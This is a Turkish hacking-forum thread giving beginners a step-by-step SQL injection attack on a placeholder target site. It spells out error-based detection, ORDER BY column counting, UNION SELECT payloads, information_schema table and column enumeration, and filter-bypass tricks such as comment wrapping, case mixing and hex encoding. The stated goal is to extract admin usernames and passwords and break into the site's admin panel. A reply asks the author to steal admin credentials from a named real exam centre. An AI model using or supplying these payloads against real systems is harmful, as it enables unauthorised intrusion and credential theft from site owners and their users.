THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Yeni Başlayanlara SQL İNJECTİON AÇIĞI admin bilgilerine ulaşma :)

dreamerr - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2008
Mesajlar:
154
Konular:
83
Teşekkür (Etti):
77
Teşekkür (Aldı):
43
Ticaret:
(0) %
06-01-2016 19:27
#1
Yeni Başlayanlara SQL İNJECTİON AÇIĞI admin bilgilerine ulaşma :)
SQL Injection Açığı Nasıl Bulunur ?

– Manuel Olarak
– Web Vulnerability Scanner Programlarıyla (Vega,Acunetix vs.)

SQL Injection Açığı Nerelerde ve Nasıl Bulunur ?

– SQL Injection açığını bulmak için ’ ya da ’a komutlarını kullanırız. Şimdi bir site düşünün site http://www.hedef.com/index.php?id=12 olsun buradaki id değerinin sonuna yanı 12’nin sonuna ’ yada ’a koyalım. Eğer
şöyle bir hata çıkarsa SQL açığı vardır.



Yani: http://www.hedef.com/index.php?id=12’ ya da http://www.hedef.com/index.php?id=12’a

SQL Açığı Nerelerde Bulunur ?

1- URL’lerdeki id (cat,c, vb.) değerlerinde



– Şimdi bir site düşünün site http://www.hedef.com/index.php?id=12 olsun buradaki id değerinin sonuna yanı 12’nin sonuna ’ yada ’a koyalım. Eğer
şöyle bir hata çıkarsa SQL açığı vardır.



2- Arama Kutularında



– Arama kutularının içine ’ ya da ’a koyunuz. Eğer Şöyle bir hata alırsanız SQL Injection açığı vardır.



3- Kayıt Formlarında



– Kayıt Formlarının içine ’ ya da ’a koyunuz. Eğer Şöyle bir hata alırsanız SQL Injection açığı vardır.



4- Yorum Kutularında



– Yorum kutusu içine ’ ya da ’a koyunuz. Eğer Şöyle bir hata alırsanız SQL Injection açığı vardır.




Saldırı

Saldırıyı dört aşamada yapacağız ama birbirleriyla bağlantılı olarak.

1) İlk önce sitenin kolon sayısını öğreneceğiz.

2) Sonra kolon sayısı yardımıyla kolonları yansıtacağız.

3) Tablo isimlerini çekeceğiz.

4) Tablolardan hedef veriyi çekeceğiz (kullanıcı adı,şifre vs.)

Saldırı Anı

1) Kolon Sayısı Öğrenme

– Arkadaşlar işlemi order+by+sayı– (sayının sonuna — işareti getirmeyi unutmayalım) komutu ile gerçekleştireceğiz. Mesela; http://www.hedef.com/index.php?id=12 URL’nin sonuna +order+by+11– komutunu ekleyelim.

Yani; http://www.hedef.com/index.php?id=12+order+by+11–; olsun Eğer şöyle bir hata çıkarsa

Hata: Unknown column ’10’ in ’order clause’ gibi bir hata çıkarsa, anlıyoruz ki kolon sayısı 11’den küçük tek tek aşağı iniyoruz yani +order+by+10–,+order+by+9–,+order+by+8– sayfa eski haline gelene kadar.
+order+by+8– ’ de sayda eski haline geri döndü. O zaman kolon sayısı 8 ’ dir. Eğer hala sayfa düzelmezse — yerine +– veya –x getirebilirsiniz.

2) Kolonları Yansıtma (Yansıtamazsak Bypass)

– Arkadaşlar burada +union+select+kolon sayılarını teker teker yazıyoruz– komutunu kullanacağız bunu URL’nin sonuna ekleyeceğiz. Mesela; http://www.hedef.com/index.php?id=12 URL’nin sonuna
+union +select+1,2,3,4,5,6,7,8– şeklinde

Yani; http://www.hedef.com/index.php?id=12+union +select+1,2,3,4,5,6,7,8– şeklinde olacak

– Şimdi ekrana sayılar yansıması lazım. Biz 3 ile 6 yansıdı diyelim. Bu sayılardan birini seçip işleme devam edeceğiz. Eğer sayılar yansımazsa ne yapmamız gerekir. Tabiki de Bypass.

Bypass

1) Normal: +union +select+1,2,3,4,5,6,7,8–

Bypass: +/*!union*/+/*!select*/+1,2,3,4,5,6,7,8–

2) Normal:+union +select+1,2,3,4,5,6,7,8–

Bypass: +union +(select+1,2,3,4,5,6,7,8–)

3) Normal:+union +select+1,2,3,4,5,6,7,8–

Bypass: +#union# +#select#+1,2,3,4,5,6,7,8–

3) Tablo İsimlerini Çekmek (İsimleri Alamazsak Bypass)

– Arkadaşlar bir önceki bölümde yazdığımız iki rakamda yani 3 ve 6 ’dan birini kullanacağız. Biz 3 ’ü seçelim, şimdi 3 üzerinden komut göndereceğiz. İlk komutumuz

A) http://www.hedef.com/index.php?id=12+union +select+1,2,database(),4,5,6,7,8–
-Bu komut sayesinde sitenin veritabanının ismini öğreniriz.

B) http://www.hedef.com/index.php?id=12+union +select+1,2,version(),4,5,6,7,8–
-Bu komut sayesinde sitenin veritabanının versiyonunu öğreniriz.

C) http://www.hedef.com/index.php?id=12+union +select+1,2,group_concat(table_name),4,5,6,7,8+fro m+information_schema.table–
– information_schema.table = veritabanındaki tablo isimlerini gösterir
– information_schema.columns = veritabanındaki kolon isimlerini gösterir

D) http://www.hedef.com/index.php?id=12+union +select+1,2,group_concat(table_name),4,5,6,7,8+fro m+information_schema.tables+where+table_schema=dat abase()–
– Bu kod sayesinde sadece hedef sitenin tablo isimlerini öğreniriz. Şimdi bu kodu gönderelim, gönderdikten sonra sitenin tablo isimleri ekrana yansıyacaktır. Örneğin yansıyan isimleri aşağıya yazalım.
– Tablo İsimleri: admin,yerler,etkinlikler,yaptıklarımız
– Bizim burada ilgileneceğimiz tablo ismi admin ’dir.

Eğer tablo isimleri yansımazsa işin içine Bypass giriyor.

Bypass

1) Normal: +union +select+1,2,group_concat(table_name),4,5,6,7,8+fro m+information_schema.tables+where+table_schema=dat abase()–

Bypass: +union +select+1,2,group_concat(taBlE_Name),4,5,6,7,8+fro m+information_schema.TabLeS+where+TabLe_schema=dat abase()–

4) Tablo İsimlerinden Veriyi Almak (Alamazsak Bypass)

– Şimdi admin’nin verilerini alacağız. Göndereceğimiz komut şudur;

– http://www.hedef.com/index.php?id=12+union +select+1,2,group_concat(CoLumn_Name),4,5,6,7,8+fr om+information_schema.CoLumns+where+TabLe_schema=d atabase()+and+TabLe_Name=admin–

bu kodu gönderdikten sonra bize admin içindeki sütunlar gelecektir. Örneğin şu sütunların geldiğini farz edelim. user,password,email,phone number Bize lazım olan user ve password




– Eğer sütunlar yansımazsa işin içine Bypass giriyor.

Bypass

1) Normal: http://www.hedef.com/index.php?id=12+union +select+1,2,group_concat(CoLumn_Name),4,5,6,7,8+fr om+information_schema.CoLumns+where+TabLe_schema=d atabase()+and+TabLe_Name=admin–

Bypass: http://www.hedef.com/index.php?id=12+union +select+1,2,group_concat(CoLumn_Name),4,5,6,7,8+fr om+information_schema.CoLumns+where+TabLe_schema=d atabase()+and+TabLe_Name=0x61646d696e–

Arkadaşlar yapmamız gereken şey TabLe_Name=admin buradaki admin kısmını hex’lemek admini hexleyeceğiz. Kullanacağımız Hex kodunu ise admin’in yerine yazıyoruz.

Normal: admin

Hex: 61646d696e

Kullanacağımız Hex: 0x61646d696e



– Kodu gönderdeğimiz anda user,password,email,phone number isimleri yansıyacak, şimdi ise user ve password sütunlarındaki bilgileri alacağız. Göndereceğimiz Kod:

http://www.hedef.com/index.php?id=12+union +select+1,2,group_concat(user,password),4,5,6,7,8+ from+admin– kodunu yazıp sayfayı yeniliyoruz.

– Şimdi ekrana admini kullanıcı adının ve şifresinin yansıması lazım. Eğer yansımazsa ne yapmamız gerekir. Tabiki Bypass

Bypass

Normal:+union +select+1,2,group_concat(user,password),4,5,6,7,8+ from+admin–

Bypass: +union +select+1,2,group_concat(String.fromCharCode(85,83 ,69,82,188,80,65,83,83,87,79,82,69)),4,5,6,7,8+fro m+admin–

Charcode:

– Mozillanın hackbar eklentisindeki Charcode programını kullanarak bypass yapacağız user,password charcode’layacağız.



– Şimdi kullanıcı adı ve password’un buldunuz. Şimdi hedef sitenin admin panelini bulup admin paneline kullanıcı adı ve şifreyi girdiğiniz anda, hedef sitenin admin paneline girmiş olacaksınız.


Selametle
wesleysneijder10 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Mesajlar:
10
Konular:
2
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
08-01-2016 00:23
#2
Yapamadım,Ortak Sınav Merkezi admin kullanıcı adı şifre bulabilirmisiniz (yeniyim)

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler